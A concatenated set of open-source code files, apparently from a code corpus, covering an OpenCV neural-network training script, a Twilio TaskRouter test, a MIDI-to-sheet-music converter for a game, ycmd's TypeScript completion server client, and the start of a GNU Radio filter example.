train_method = cv2.ANN_MLP_TRAIN_PARAMS_BACKPROP,
bp_dw_scale = 0.001,
bp_moment_scale = 0.0 )
print 'Training MLP ...'
num_iter = model.train(train, train_labels, None, params = params)
# set end time
e2 = cv2.getTickCount()
time = (e2 - e1)/cv2.getTickFrequency()
print 'Training duration:', time
# save param
model.save('mlp_xml/mlp.xml')
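# Hypothetical follow-up (added; not in the original script): the saved
# network can be reloaded for inference with the same OpenCV 2.4 API, e.g.
#
#   model = cv2.ANN_MLP()
#   model.load('mlp_xml/mlp.xml')
#   ret, resp = model.predict(samples)  # samples: N x 38400 float32 rows
#   steering = resp.argmax(-1)          # index of the strongest output unit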
print 'Ran for %d iterations' % num_iter
ret, resp = model.predict(train)
prediction = resp.argmax(-1)
print 'Prediction:', prediction
true_labels = train_labels.argmax(-1)
print 'True labels:', true_labels
print 'Testing...'
train_rate = np.mean(prediction == true_labels)
print 'Train rate: %f:' % (train_rate*100) | bsd-2-clause |
tysonholub/twilio-python | tests/integration/taskrouter/v1/workspace/worker/test_worker_statistics.py | 1 | 3649 | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class WorkerStatisticsTestCase(IntegrationTestCase):
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.workers(sid="WKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.statistics().fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://taskrouter.twilio.com/v1/Workspaces/WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Workers/WKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Statistics',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"cumulative": {
"reservations_created": 100,
"reservations_accepted": 100,
"reservations_rejected": 100,
"reservations_timed_out": 100,
"reservations_canceled": 100,
"reservations_rescinded": 100,
"activity_durations": [
{
"max": 0,
"min": 900,
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Offline",
"avg": 1080,
"total": 5400
},
{
"max": 0,
"min": 900,
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Busy",
"avg": 1012,
"total": 8100
},
{
"max": 0,
"min": 0,
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Idle",
"avg": 0,
"total": 0
},
{
"max": 0,
"min": 0,
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Reserved",
"avg": 0,
"total": 0
}
],
"start_time": "2008-01-02T00:00:00Z",
"end_time": "2008-01-02T00:00:00Z"
},
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"workspace_sid": "WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"worker_sid": "WKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Workers/WKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Statistics"
}
'''
))
actual = self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.workers(sid="WKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.statistics().fetch()
self.assertIsNotNone(actual)
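# Hedged usage note (added; not part of the generated test): against the live
# API the same call returns a WorkerStatisticsInstance, and the JSON body
# mocked above is expected to surface through its properties, e.g.
# (assuming valid credentials and real SIDs):
#
#   stats = client.taskrouter.v1.workspaces(sid=workspace_sid) \
#       .workers(sid=worker_sid).statistics().fetch()
#   stats.cumulative['reservations_accepted']  # -> 100 with the mocked body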
| mit |
Incoming5643/-tg-station | tools/midi2piano/midi2piano.py | 89 | 9532 | """
This module allows the user to convert MIDI melodies into SS13 sheet music
ready for copy-and-paste
"""
from functools import reduce
import midi as mi
import easygui as egui
import pyperclip as pclip
LINE_LENGTH_LIM = 50
LINES_LIMIT = 200
TICK_LAG = 0.5
OVERALL_IMPORT_LIM = 2*LINE_LENGTH_LIM*LINES_LIMIT
END_OF_LINE_CHAR = """
""" # BYOND can't parse \n and I am forced to define my own NEWLINE char
OCTAVE_TRANSPOSE = 0 # Change here to transpose melodies by octaves
FLOAT_PRECISION = 2 # Change here to allow more or less numbers after dot in floats
OCTAVE_KEYS = 12
HIGHEST_OCTAVE = 8
time_quanta = 100 * TICK_LAG
"""
class Meta():
version = 1.0
integer = 1
anti_integer = -1
maximum = 1000
epsilon = 0.51
delta_epsilon = -0.1
integral = []
tensor = [[],[],[]]
o_complexity = epsilon**2
random_variance = 0.01
"""
# UTILITY FUNCTIONS
def condition(event):
"""
This function checks whether a given MIDI event is meaningful
"""
if event[0] == 'track_name' and event[2] == 'Drums': # Percussion
return False
if event[0] == 'note': # Only thing that matters
return True
return False
def notenum2string(num, accidentals, octaves):
"""
This function converts the given MIDI note number to an SS13 note name,
taking into account the accidentals and octaves state (_accidentals_ and
_octaves_) carried over from previous calls
"""
names = ['C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B']
convert_table = {1:0, 3:1, 6:2, 8:3, 10:4}
inclusion_table = {0:0, 2:1, 5:2, 7:3, 9:4}
num += OCTAVE_KEYS * OCTAVE_TRANSPOSE
octave = int(num / OCTAVE_KEYS)
if octave < 1 or octave > HIGHEST_OCTAVE:
return ["", accidentals, octaves]
accidentals = accidentals.copy()
octaves = octaves.copy()
output_octaves = list(octaves)
name_indx = num % OCTAVE_KEYS
accidental = (len(names[name_indx]) == 2)
output_octaves[name_indx] = octave
add_n = False
if accidental:
accidentals[convert_table[name_indx]] = True
else:
if name_indx in inclusion_table:
add_n = accidentals[inclusion_table[name_indx]]
accidentals[inclusion_table[name_indx]] = False
return [
(
names[name_indx]+
("n" if add_n else "")+
str((octave if octave != octaves[name_indx] else ""))
),
accidentals,
output_octaves
]
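# Worked example (added for illustration): with fresh state
# accidentals = [False]*7 and octaves = [3]*12, MIDI note 60 maps to
# octave int(60/12) = 5 and name index 60 % 12 = 0 ('C'); since 5 differs
# from octaves[0] == 3, the call returns 'C5' plus the updated state.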
def dur2mod(dur, bpm_mod=1.0):
"""
This function returns the string representation of the duration modifier,
ready to be appended to the note after '/'
"""
mod = bpm_mod / dur
mod = round(mod, FLOAT_PRECISION)
return str(mod).rstrip('0').rstrip('.')
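# Worked example (added for illustration): dur2mod(500, 1000.0) computes
# 1000.0 / 500 = 2.0, rounds to FLOAT_PRECISION decimals, and strips the
# trailing zeros and dot, returning '2'.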
# END OF UTILITY FUNCTIONS
# CONVERSION FUNCTIONS
def obtain_midi_file():
"""
Asks user to select MIDI and returns this file opened in binary mode for reading
"""
file = egui.fileopenbox(msg='Choose MIDI file to convert',
title='MIDI file selection',
filetypes=[['*.mid', 'MID files']])
if not file:
return None
file = open(file, mode='rb').read()
return file
def midi2score_without_ticks(midi_file):
"""
Transforms the aforementioned file into a score, truncates it and returns it
"""
opus = mi.midi2opus(midi_file)
opus = mi.to_millisecs(opus)
score = mi.opus2score(opus)
return score[1:] # Ticks don't matter anymore, it is always 1000
def filter_events_from_score(score):
"""
Filters out irrelevant events and returns new score
"""
return list(map( # For each score track
lambda score_track: list(filter( # Filter irrelevant events
condition,
score_track
)),
score
))
def filter_empty_tracks(score):
"""
Filters out empty tracks and returns new score
"""
return list(filter(
lambda score_track: score_track,
score))
def filter_start_time_and_note_num(score):
"""
Recreates score with only note numbers and start time of each note and returns new score
"""
return list(map(
lambda score_track: list(map(
lambda event: [event[1], event[4]],
score_track)),
score))
def merge_events(score):
"""Merges all tracks together and returns new score"""
return list(reduce(
lambda lst1, lst2: lst1+lst2,
score))
def sort_score_by_event_times(score):
"""Sorts events by start time and returns new score"""
return list(map(
lambda index: score[index],
sorted(
list(range(len(score))),
key=lambda indx: score[indx][0])
))
def convert_into_delta_times(score):
"""
Transforms start_time into delta_time and returns new score
"""
return list(map(
lambda super_event: (
[
super_event[1][0]-super_event[0][0],
super_event[0][1]
]), # [ [1, 2], [3, 4] ] -> [ [2, 2] ]
zip(score[:-1], score[1:]) # Shifted association. [1, 2, 3] -> [ (1, 2), (2, 3) ]
))+[[1000, score[-1][1]]] # Add 1 second note to the end
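# Worked example (added for illustration): a score of absolute start times
# [[0, 60], [500, 64], [1000, 67]] becomes the delta-time score
# [[500, 60], [500, 64], [1000, 67]]: each note now carries the gap to the
# next note, and the final note is padded with a fixed 1000 ms duration.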
def perform_roundation(score):
"""
Rounds delta times to the nearest multiple of time quanta, as BYOND can't
process durations shorter than that, and returns new score
"""
return list(map(
lambda event: [time_quanta*round(event[0]/time_quanta), event[1]],
score))
def obtain_common_duration(score):
"""
Returns the most frequent duration throughout the whole melody
"""
# Parse durations and filter out 0s
durs = list(filter(lambda x: x, list(map(lambda event: event[0], score))))
unique_durs = []
for dur in durs:
if dur not in unique_durs:
unique_durs.append(dur)
# How many such durations occur throughout the melody?
counter = [durs.count(dur) for dur in unique_durs]
highest_counter = max(counter) # Highest counter
dur_n_count = list(zip(unique_durs, counter))
dur_n_count = list(filter(lambda e: e[1] == highest_counter, dur_n_count))
return dur_n_count[0][0] # Will be there
def reduce_score_to_chords(score):
"""
Reforms score into a chord-duration list:
[[chord_notes], duration_of_chord]
and returns it
"""
new_score = []
new_chord = [[], 0]
# [ [chord notes], duration of chord ]
for event in score:
new_chord[0].append(event[1]) # Append new note to the chord
if event[0] == 0:
continue # Add new notes to the chord until non-zero duration is hit
new_chord[1] = event[0] # This is the duration of chord
new_score.append(new_chord) # Append chord to the list
new_chord = [[], 0] # Reset the chord
return new_score
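# Worked example (added for illustration): the delta-time score
# [[0, 60], [0, 64], [500, 67]] reduces to [[[60, 64, 67], 500]]; the
# zero-duration notes are gathered into one chord that sounds for 500 ms.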
def obtain_sheet_music(score, most_frequent_dur):
"""
Returns unformated sheet music from score
"""
result = ""
octaves = [3 for i in range(12)]
accidentals = [False for i in range(7)]
for event in score:
for note_indx in range(len(event[0])):
data = notenum2string(event[0][note_indx], accidentals, octaves)
result += data[0]
accidentals = data[1]
octaves = data[2]
if note_indx != len(event[0])-1:
result += '-'
if event[1] != most_frequent_dur: # Quarters are default
result += '/'
result += dur2mod(event[1], most_frequent_dur)
result += ','
return result
def explode_sheet_music(sheet_music):
"""
Splits unformatted sheet music into formatted lines that respect
LINE_LENGTH_LIM and LINES_LIMIT, and returns a list of such lines
"""
split_music = sheet_music.split(',')
split_music = list(map(lambda note: note+',', split_music))
split_list = []
counter = 0
line_counter = 1
for note in split_music:
if line_counter > LINES_LIMIT-1:
break
if counter+len(note) > LINE_LENGTH_LIM-2:
split_list[-1] = split_list[-1].rstrip(',')
split_list[-1] += END_OF_LINE_CHAR
counter = 0
line_counter += 1
split_list.append(note)
counter += len(note)
return split_list
def finalize_sheet_music(split_music, most_frequent_dur):
"""
Recreates sheet music from exploded sheet music, truncates it and returns it
"""
sheet_music = ""
for note in split_music:
sheet_music += note
sheet_music = sheet_music.rstrip(',') # Trim the last ,
sheet_music = "BPM: " + str(int(60000 / most_frequent_dur)) + END_OF_LINE_CHAR + sheet_music
return sheet_music[:min(len(sheet_music), OVERALL_IMPORT_LIM)]
# END OF CONVERSION FUNCTIONS
def main_cycle():
"""
Activate the script
"""
while True:
midi_file = obtain_midi_file()
if not midi_file:
return # Cancel
score = midi2score_without_ticks(midi_file)
score = filter_events_from_score(score)
score = filter_start_time_and_note_num(score)
score = filter_empty_tracks(score)
score = merge_events(score)
score = sort_score_by_event_times(score)
score = convert_into_delta_times(score)
score = perform_roundation(score)
most_frequent_dur = obtain_common_duration(score)
score = reduce_score_to_chords(score)
sheet_music = obtain_sheet_music(score, most_frequent_dur)
split_music = explode_sheet_music(sheet_music)
sheet_music = finalize_sheet_music(split_music, most_frequent_dur)
pclip.copy(sheet_music)
main_cycle()
| agpl-3.0 |
mispencer/ycmd | ycmd/completers/typescript/typescript_completer.py | 1 | 22168 | # Copyright (C) 2015 - 2016 Google Inc.
# 2016 ycmd contributors
#
# This file is part of ycmd.
#
# ycmd is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ycmd is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ycmd. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import * # noqa
import json
import logging
import os
import re
import subprocess
import itertools
import threading
from tempfile import NamedTemporaryFile
from ycmd import responses
from ycmd import utils
from ycmd.completers.completer import Completer
from ycmd.completers.completer_utils import GetFileContents
BINARY_NOT_FOUND_MESSAGE = ( 'TSServer not found. '
'TypeScript 1.5 or higher is required.' )
SERVER_NOT_RUNNING_MESSAGE = 'TSServer is not running.'
MAX_DETAILED_COMPLETIONS = 100
RESPONSE_TIMEOUT_SECONDS = 10
PATH_TO_TSSERVER = utils.FindExecutable( 'tsserver' )
LOGFILE_FORMAT = 'tsserver_'
_logger = logging.getLogger( __name__ )
class DeferredResponse( object ):
"""
A deferred that resolves to a response from TSServer.
"""
def __init__( self, timeout = RESPONSE_TIMEOUT_SECONDS ):
self._event = threading.Event()
self._message = None
self._timeout = timeout
def resolve( self, message ):
self._message = message
self._event.set()
def result( self ):
self._event.wait( timeout = self._timeout )
if not self._event.isSet():
raise RuntimeError( 'Response Timeout' )
message = self._message
if not message[ 'success' ]:
raise RuntimeError( message[ 'message' ] )
if 'body' in message:
return self._message[ 'body' ]
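# Usage sketch (added for illustration; not in the original module): the
# writer registers a DeferredResponse under the request's sequence id and
# the reader thread resolves it later:
#
#   deferred = DeferredResponse()
#   pending[ seq ] = deferred      # writer side, before sending the request
#   ...                            # reader thread: pending[ seq ].resolve( msg )
#   body = deferred.result()       # blocks up to RESPONSE_TIMEOUT_SECONDS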
def ShouldEnableTypescriptCompleter():
if not PATH_TO_TSSERVER:
_logger.error( BINARY_NOT_FOUND_MESSAGE )
return False
_logger.info( 'Using TSServer located at {0}'.format( PATH_TO_TSSERVER ) )
return True
class TypeScriptCompleter( Completer ):
"""
Completer for TypeScript.
It uses TSServer which is bundled with TypeScript 1.5
See the protocol here:
https://github.com/Microsoft/TypeScript/blob/2cb0dfd99dc2896958b75e44303d8a7a32e5dc33/src/server/protocol.d.ts
"""
def __init__( self, user_options ):
super( TypeScriptCompleter, self ).__init__( user_options )
self._logfile = None
self._tsserver_handle = None
# Used to prevent threads from concurrently writing to
# the tsserver process' stdin
self._write_lock = threading.Lock()
# Each request sent to tsserver must have a sequence id.
# Responses contain the id sent in the corresponding request.
self._sequenceid = itertools.count()
# Used to prevent threads from concurrently accessing the sequence counter
self._sequenceid_lock = threading.Lock()
self._server_lock = threading.RLock()
# Used to read response only if TSServer is running.
self._tsserver_is_running = threading.Event()
# Start a thread to read response from TSServer.
self._thread = threading.Thread( target = self._ReaderLoop, args = () )
self._thread.daemon = True
self._thread.start()
self._StartServer()
# Used to map sequence id's to their corresponding DeferredResponse
# objects. The reader loop uses this to hand out responses.
self._pending = {}
# Used to prevent threads from concurrently reading and writing to
# the pending response dictionary
self._pending_lock = threading.Lock()
_logger.info( 'Enabling typescript completion' )
def _StartServer( self ):
with self._server_lock:
if self._ServerIsRunning():
return
self._logfile = utils.CreateLogfile( LOGFILE_FORMAT )
tsserver_log = '-file {path} -level {level}'.format( path = self._logfile,
level = _LogLevel() )
# TSServer gets the configuration for the log file through the
# environment variable 'TSS_LOG'. This seems to be undocumented but
# looking at the source code it seems like this is the way:
# https://github.com/Microsoft/TypeScript/blob/8a93b489454fdcbdf544edef05f73a913449be1d/src/server/server.ts#L136
environ = os.environ.copy()
utils.SetEnviron( environ, 'TSS_LOG', tsserver_log )
_logger.info( 'TSServer log file: {0}'.format( self._logfile ) )
# We need to redirect the error stream to the output one on Windows.
self._tsserver_handle = utils.SafePopen( PATH_TO_TSSERVER,
stdin = subprocess.PIPE,
stdout = subprocess.PIPE,
stderr = subprocess.STDOUT,
env = environ )
self._tsserver_is_running.set()
def _ReaderLoop( self ):
"""
Read responses from TSServer and use them to resolve
the DeferredResponse instances.
"""
while True:
self._tsserver_is_running.wait()
try:
message = self._ReadMessage()
except RuntimeError:
_logger.exception( SERVER_NOT_RUNNING_MESSAGE )
self._tsserver_is_running.clear()
continue
# We ignore events for now since we don't have a use for them.
msgtype = message[ 'type' ]
if msgtype == 'event':
eventname = message[ 'event' ]
_logger.info( 'Received {0} event from tsserver'.format( eventname ) )
continue
if msgtype != 'response':
_logger.error( 'Unsupported message type {0}'.format( msgtype ) )
continue
seq = message[ 'request_seq' ]
with self._pending_lock:
if seq in self._pending:
self._pending[ seq ].resolve( message )
del self._pending[ seq ]
def _ReadMessage( self ):
"""Read a response message from TSServer."""
# The headers are pretty similar to HTTP.
# At the time of writing, 'Content-Length' is the only supplied header.
headers = {}
while True:
headerline = self._tsserver_handle.stdout.readline().strip()
if not headerline:
break
key, value = utils.ToUnicode( headerline ).split( ':', 1 )
headers[ key.strip() ] = value.strip()
# The response message is a JSON object which comes back on one line.
# Since this might change in the future, we use the 'Content-Length'
# header.
if 'Content-Length' not in headers:
raise RuntimeError( "Missing 'Content-Length' header" )
contentlength = int( headers[ 'Content-Length' ] )
# TSServer adds a newline at the end of the response message and counts it
# as one character (\n) towards the content length. However, newlines are
# two characters on Windows (\r\n), so we need to take care of that. See
# issue https://github.com/Microsoft/TypeScript/issues/3403
content = self._tsserver_handle.stdout.read( contentlength )
if utils.OnWindows() and content.endswith( b'\r' ):
content += self._tsserver_handle.stdout.read( 1 )
return json.loads( utils.ToUnicode( content ) )
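# Illustration (added; not in the original source) of the wire format this
# parser expects: an HTTP-like header block, a blank line, then a JSON
# payload of exactly Content-Length bytes (59 here, counting the trailing
# newline):
#
#   Content-Length: 59
#
#   {"seq":0,"type":"response","request_seq":1,"success":true}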
def _BuildRequest( self, command, arguments = None ):
"""Build TSServer request object."""
with self._sequenceid_lock:
seq = next( self._sequenceid )
request = {
'seq': seq,
'type': 'request',
'command': command
}
if arguments:
request[ 'arguments' ] = arguments
return request
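# Example (added for illustration) of a request object produced above, e.g.
# for opening a file:
#
#   { "seq": 0, "type": "request", "command": "open",
#     "arguments": { "file": "/path/to/file.ts" } }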
def _WriteRequest( self, request ):
"""Write a request to TSServer stdin."""
serialized_request = utils.ToBytes( json.dumps( request ) + '\n' )
with self._write_lock:
try:
self._tsserver_handle.stdin.write( serialized_request )
self._tsserver_handle.stdin.flush()
# IOError is an alias of OSError in Python 3.
except ( AttributeError, IOError ):
_logger.exception( SERVER_NOT_RUNNING_MESSAGE )
raise RuntimeError( SERVER_NOT_RUNNING_MESSAGE )
def _SendCommand( self, command, arguments = None ):
"""
Send a request message to TSServer but don't wait for the response.
This function is to be used when we don't care about the response
to the message that is sent.
"""
request = self._BuildRequest( command, arguments )
self._WriteRequest( request )
def _SendRequest( self, command, arguments = None ):
"""
Send a request message to TSServer and wait
for the response.
"""
request = self._BuildRequest( command, arguments )
deferred = DeferredResponse()
with self._pending_lock:
seq = request[ 'seq' ]
self._pending[ seq ] = deferred
self._WriteRequest( request )
return deferred.result()
def _Reload( self, request_data ):
"""
Synchronize TSServer's view of the file to
the contents of the unsaved buffer.
"""
filename = request_data[ 'filepath' ]
contents = request_data[ 'file_data' ][ filename ][ 'contents' ]
tmpfile = NamedTemporaryFile( delete = False )
tmpfile.write( utils.ToBytes( contents ) )
tmpfile.close()
self._SendRequest( 'reload', {
'file': filename,
'tmpfile': tmpfile.name
} )
utils.RemoveIfExists( tmpfile.name )
def _ServerIsRunning( self ):
with self._server_lock:
return utils.ProcessIsRunning( self._tsserver_handle )
def ServerIsHealthy( self ):
return self._ServerIsRunning()
def SupportedFiletypes( self ):
return [ 'typescript' ]
def ComputeCandidatesInner( self, request_data ):
self._Reload( request_data )
entries = self._SendRequest( 'completions', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'start_codepoint' ]
} )
# A less detailed version of the completion data is returned
# if there are too many entries. This improves responsiveness.
if len( entries ) > MAX_DETAILED_COMPLETIONS:
return [ _ConvertCompletionData(e) for e in entries ]
names = []
namelength = 0
for e in entries:
name = e[ 'name' ]
namelength = max( namelength, len( name ) )
names.append( name )
detailed_entries = self._SendRequest( 'completionEntryDetails', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'start_codepoint' ],
'entryNames': names
} )
return [ _ConvertDetailedCompletionData( e, namelength )
for e in detailed_entries ]
def GetSubcommandsMap( self ):
return {
'RestartServer' : ( lambda self, request_data, args:
self._RestartServer( request_data ) ),
'StopServer' : ( lambda self, request_data, args:
self._StopServer() ),
'GoToDefinition' : ( lambda self, request_data, args:
self._GoToDefinition( request_data ) ),
'GoToReferences' : ( lambda self, request_data, args:
self._GoToReferences( request_data ) ),
'GoToType' : ( lambda self, request_data, args:
self._GoToType( request_data ) ),
'GetType' : ( lambda self, request_data, args:
self._GetType( request_data ) ),
'GetDoc' : ( lambda self, request_data, args:
self._GetDoc( request_data ) ),
'RefactorRename' : ( lambda self, request_data, args:
self._RefactorRename( request_data, args ) ),
}
def OnBufferVisit( self, request_data ):
filename = request_data[ 'filepath' ]
self._SendCommand( 'open', { 'file': filename } )
def OnBufferUnload( self, request_data ):
filename = request_data[ 'filepath' ]
self._SendCommand( 'close', { 'file': filename } )
def OnFileReadyToParse( self, request_data ):
self._Reload( request_data )
def _GoToDefinition( self, request_data ):
self._Reload( request_data )
try:
filespans = self._SendRequest( 'definition', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ]
} )
span = filespans[ 0 ]
return responses.BuildGoToResponseFromLocation(
_BuildLocation( utils.SplitLines( GetFileContents( request_data,
span[ 'file' ] ) ),
span[ 'file' ],
span[ 'start' ][ 'line' ],
span[ 'start' ][ 'offset' ] ) )
except RuntimeError:
raise RuntimeError( 'Could not find definition' )
def _GoToReferences( self, request_data ):
self._Reload( request_data )
response = self._SendRequest( 'references', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ]
} )
return [
responses.BuildGoToResponseFromLocation(
_BuildLocation( utils.SplitLines( GetFileContents( request_data,
ref[ 'file' ] ) ),
ref[ 'file' ],
ref[ 'start' ][ 'line' ],
ref[ 'start' ][ 'offset' ] ),
ref[ 'lineText' ] )
for ref in response[ 'refs' ]
]
def _GoToType( self, request_data ):
self._Reload( request_data )
try:
filespans = self._SendRequest( 'typeDefinition', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_num' ]
} )
span = filespans[ 0 ]
return responses.BuildGoToResponse(
filepath = span[ 'file' ],
line_num = span[ 'start' ][ 'line' ],
column_num = span[ 'start' ][ 'offset' ]
)
except RuntimeError:
raise RuntimeError( 'Could not find type definition' )
def _GetType( self, request_data ):
self._Reload( request_data )
info = self._SendRequest( 'quickinfo', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ]
} )
return responses.BuildDisplayMessageResponse( info[ 'displayString' ] )
def _GetDoc( self, request_data ):
self._Reload( request_data )
info = self._SendRequest( 'quickinfo', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ]
} )
message = '{0}\n\n{1}'.format( info[ 'displayString' ],
info[ 'documentation' ] )
return responses.BuildDetailedInfoResponse( message )
def _RefactorRename( self, request_data, args ):
if len( args ) != 1:
raise ValueError( 'Please specify a new name to rename it to.\n'
'Usage: RefactorRename <new name>' )
self._Reload( request_data )
response = self._SendRequest( 'rename', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ],
'findInComments': False,
'findInStrings': False,
} )
if not response[ 'info' ][ 'canRename' ]:
raise RuntimeError( 'Value cannot be renamed: {0}'.format(
response[ 'info' ][ 'localizedErrorMessage' ] ) )
# The format of the response is:
#
# body {
# info {
# ...
# triggerSpan: {
# length: original_length
# }
# }
#
# locs [ {
# file: file_path
# locs: [
# start: {
# line: line_num
# offset: offset
# }
# end {
# line: line_num
# offset: offset
# }
# ] }
# ]
# }
#
new_name = args[ 0 ]
location = responses.Location( request_data[ 'line_num' ],
request_data[ 'column_num' ],
request_data[ 'filepath' ] )
chunks = []
for file_replacement in response[ 'locs' ]:
chunks.extend( _BuildFixItChunksForFile( request_data,
new_name,
file_replacement ) )
return responses.BuildFixItResponse( [
responses.FixIt( location, chunks )
] )
def _RestartServer( self, request_data ):
with self._server_lock:
self._StopServer()
self._StartServer()
# This is needed because after we restart the TSServer it would lose all
# the information about the files we were working on. This means that the
# newly started TSServer will know nothing about the buffer we're working
# on after restarting the server. So if we restart the server and right
# after that ask for completion in the buffer, the server will timeout.
# So we notify the server that we're working on the current buffer.
self.OnBufferVisit( request_data )
def _StopServer( self ):
with self._server_lock:
if self._ServerIsRunning():
_logger.info( 'Stopping TSServer with PID {0}'.format(
self._tsserver_handle.pid ) )
self._SendCommand( 'exit' )
try:
utils.WaitUntilProcessIsTerminated( self._tsserver_handle,
timeout = 5 )
_logger.info( 'TSServer stopped' )
except RuntimeError:
_logger.exception( 'Error while stopping TSServer' )
self._CleanUp()
def _CleanUp( self ):
utils.CloseStandardStreams( self._tsserver_handle )
self._tsserver_handle = None
if not self.user_options[ 'server_keep_logfiles' ]:
utils.RemoveIfExists( self._logfile )
self._logfile = None
def Shutdown( self ):
self._StopServer()
def DebugInfo( self, request_data ):
with self._server_lock:
if self._ServerIsRunning():
return ( 'TypeScript completer debug information:\n'
' TSServer running\n'
' TSServer process ID: {0}\n'
' TSServer executable: {1}\n'
' TSServer logfile: {2}'.format( self._tsserver_handle.pid,
PATH_TO_TSSERVER,
self._logfile ) )
if self._logfile:
return ( 'TypeScript completer debug information:\n'
' TSServer no longer running\n'
' TSServer executable: {0}\n'
' TSServer logfile: {1}'.format( PATH_TO_TSSERVER,
self._logfile ) )
return ( 'TypeScript completer debug information:\n'
' TSServer is not running\n'
' TSServer executable: {0}'.format( PATH_TO_TSSERVER ) )
def _LogLevel():
return 'verbose' if _logger.isEnabledFor( logging.DEBUG ) else 'normal'
def _ConvertCompletionData( completion_data ):
return responses.BuildCompletionData(
insertion_text = completion_data[ 'name' ],
menu_text = completion_data[ 'name' ],
kind = completion_data[ 'kind' ],
extra_data = completion_data[ 'kind' ]
)
def _ConvertDetailedCompletionData( completion_data, padding = 0 ):
name = completion_data[ 'name' ]
display_parts = completion_data[ 'displayParts' ]
signature = ''.join( [ p[ 'text' ] for p in display_parts ] )
# needed to strip new lines and indentation from the signature
signature = re.sub( r'\s+', ' ', signature )
menu_text = '{0} {1}'.format( name.ljust( padding ), signature )
return responses.BuildCompletionData(
insertion_text = name,
menu_text = menu_text,
kind = completion_data[ 'kind' ]
)
def _BuildFixItChunkForRange( new_name,
file_contents,
file_name,
source_range ):
""" returns list FixItChunk for a tsserver source range """
return responses.FixItChunk(
new_name,
responses.Range(
start = _BuildLocation( file_contents,
file_name,
source_range[ 'start' ][ 'line' ],
source_range[ 'start' ][ 'offset' ] ),
end = _BuildLocation( file_contents,
file_name,
source_range[ 'end' ][ 'line' ],
source_range[ 'end' ][ 'offset' ] ) ) )
def _BuildFixItChunksForFile( request_data, new_name, file_replacement ):
""" returns a list of FixItChunk for each replacement range for the
supplied file"""
# On windows, tsserver annoyingly returns file path as C:/blah/blah,
# whereas all other paths in Python are of the C:\\blah\\blah form. We use
# normpath to have python do the conversion for us.
file_path = os.path.normpath( file_replacement[ 'file' ] )
file_contents = utils.SplitLines( GetFileContents( request_data, file_path ) )
return [ _BuildFixItChunkForRange( new_name, file_contents, file_path, r )
for r in file_replacement[ 'locs' ] ]
def _BuildLocation( file_contents, filename, line, offset ):
return responses.Location(
line = line,
# tsserver returns codepoint offsets, but we need byte offsets, so we must
# convert
column = utils.CodepointOffsetToByteOffset( file_contents[ line - 1 ],
offset ),
filename = filename )
| gpl-3.0 |
gnu-sandhi/sandhi | modules/gr36/gnuradio-core/src/examples/pfb/interpolate.py | 17 | 8253 | #!/usr/bin/env python
#
# Copyright 2009 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, blks2
import sys, time
try:
import scipy
from scipy import fftpack
except ImportError:
print "Error: Program requires scipy (see: www.scipy.org)."
sys.exit(1)
try:
import pylab
from pylab import mlab
except ImportError:
print "Error: Program requires matplotlib (see: matplotlib.sourceforge.net)."
sys.exit(1)
class pfb_top_block(gr.top_block):
